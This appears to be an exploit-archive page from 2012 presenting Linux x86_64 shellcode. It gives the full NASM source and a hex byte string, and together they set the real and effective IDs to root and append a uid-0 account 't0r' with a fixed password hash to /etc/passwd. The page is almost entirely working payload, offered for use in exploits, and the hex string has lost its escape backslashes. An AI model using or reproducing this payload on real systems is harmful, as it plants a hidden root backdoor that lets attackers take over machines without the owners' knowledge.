[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux x86_64 - add user with passwd (189 bytes)
# Published : 2012-03-12
# Author :
# Previous Title : Linux/x86 Search For php,html Writable Files and Add Your Code
# Next Title : bds/x86-bindshell on port 2525 shellcode - 167 bytes
;sc_adduser01.S
;Arch: x86_64, Linux
;
;Author: 0_o -- null_null
; nu11.nu11 [at] yahoo.com
;Date: 2012-03-05
;
;compile an executable: nasm -f elf64 sc_adduser.S
; ld -o sc_adduser sc_adduser.o
;compile an object: nasm -o sc_adduser_obj sc_adduser.S
;
;Purpose: adds user "t0r" with password "Winner" to /etc/passwd
;executed syscalls: setreuid, setregid, open, write, close, exit
;Result: t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash
;syscall op codes: /usr/include/x86_64-linux-gnu/asm/unistd_64.h
BITS 64
[SECTION .text]
global _start
_start:
;sys_setreuid(uint ruid, uint euid)
xor rax, rax
mov al, 113 ;syscall sys_setreuid
xor rbx, rbx ;arg 1 -- set real uid to root
mov rcx, rbx ;arg 2 -- set effective uid to root
syscall
;sys_setregid(uint rgid, uint egid)
xor rax, rax
mov al, 114 ;syscall sys_setregid
xor rbx, rbx ;arg 1 -- set real uid to root
mov rcx, rbx ;arg 2 -- set effective uid to root
syscall
;push all strings on the stack prior to file operations.
xor rbx, rbx
mov ebx, 0x647773FF
shr rbx, 8
push rbx ;string 0dws
mov rbx, 0x7361702f6374652f
push rbx ;string sap/cte/
mov rbx, 0x0A687361622F6EFF
shr rbx, 8
push rbx ;string 0nhsab/n
mov rbx, 0x69622F3A746F6F72
push rbx ;string ib/:toor
mov rbx, 0x2F3A3A303A303A67
push rbx ;string /::0:0:g
mov rbx, 0x46556B554B587435
push rbx ;string FUkUKXt5
mov rbx, 0x546755333A723074
push rbx ;string TgU3:r0t
;prelude to doing anything useful...
mov rbx, rsp ;save stack pointer for later use
push rbp ;store base pointer to stack so it can be restored later
mov rbp, rsp ;set base pointer to current stack pointer
;sys_open(char* fname, int flags, int mode)
sub rsp, 16
mov [rbp - 16], rbx ;store pointer to "t0r..../bash"
mov si, 0x0401 ;arg 2 -- flags
mov rdi, rbx
add rdi, 40 ;arg 1 -- pointer to "/etc/passwd"
xor rax, rax
mov al, 2 ;syscall sys_open
syscall
;sys_write(uint fd, char* buf, uint size)
mov [rbp - 4], eax ;arg 1 -- fd is retval of sys_open. save fd to stack for later use.
mov rcx, rbx ;arg 2 -- load rcx with pointer to string "t0r.../bash"
xor rdx, rdx
mov dl, 39 ;arg 3 -- load rdx with size of string "t0r.../bash 0"
mov rsi, rcx ;arg 2 -- move to source index register
mov rdi, rax ;arg 1 -- move to destination index register
xor rax, rax
mov al, 1 ;syscall sys_write
syscall
;sys_close(uint fd)
xor rdi, rdi
mov edi, [rbp - 4] ;arg 1 -- load stored file descriptor to destination index register
xor rax, rax
mov al, 3 ;syscall sys_close
syscall
;sys_exit(int err_code)
xor rax, rax
mov al, 60 ;syscall sys_exit
xor rbx, rbx ;arg 1 -- error code
syscall
;char shellcode[] =
; "x48x31xc0xb0x71x48x31xdbx48x31xc9x0fx05x48x31"
; "xc0xb0x72x48x31xdbx48x31xc9x0fx05x48x31xdbxbb"
; "xffx73x77x64x48xc1xebx08x53x48xbbx2fx65x74x63"
; "x2fx70x61x73x53x48xbbxffx6ex2fx62x61x73x68x0a"
; "x48xc1xebx08x53x48xbbx72x6fx6fx74x3ax2fx62x69"
; "x53x48xbbx67x3ax30x3ax30x3ax3ax2fx53x48xbbx35"
; "x74x58x4bx55x6bx55x46x53x48xbbx74x30x72x3ax33"
; "x55x67x54x53x48x89xe3x55x48x89xe5x48x83xecx10"
; "x48x89x5dxf0x66xbex01x04x48x89xdfx48x83xc7x28"
; "x48x31xc0xb0x02x0fx05x89x45xfcx48x89xd9x48x31"
; "xd2xb2x27x48x89xcex48x89xc7x48x31xc0xb0x01x0f"
; "x05x48x31xffx8bx7dxfcx48x31xc0xb0x03x0fx05x48"
; "x31xc0xb0x3cx48x31xdbx0fx05";
;
;equivalent code:
;
;char shellcode[] =
; "x48x31xc0xb0x71x48x31xdbx48x89xd9x0fx05x48x31"
; "xc0xb0x72x48x31xdbx48x89xd9x0fx05x48x31xdbxbb"
; "xffx73x77x64x48xc1xebx08x53x48xbbx2fx65x74x63"
; "x2fx70x61x73x53x48xbbxffx6ex2fx62x61x73x68x0a"
; "x48xc1xebx08x53x48xbbx72x6fx6fx74x3ax2fx62x69"
; "x53x48xbbx67x3ax30x3ax30x3ax3ax2fx53x48xbbx35"
; "x74x58x4bx55x6bx55x46x53x48xbbx74x30x72x3ax33"
; "x55x67x54x53x48x89xe3x55x48x89xe5x48x83xecx10"
; "x48x89x5dxf0x66xbex01x04x48x89xdfx48x83xc7x28"
; "x48x31xc0xb0x02x0fx05x89x45xfcx48x89xd9x48x31"
; "xd2xb2x27x48x89xcex48x89xc7x48x31xc0xb0x01x0f"
; "x05x48x31xffx8bx7dxfcx48x31xc0xb0x03x0fx05x48"
; "x31xc0xb0x3cx48x31xdbx0fx05";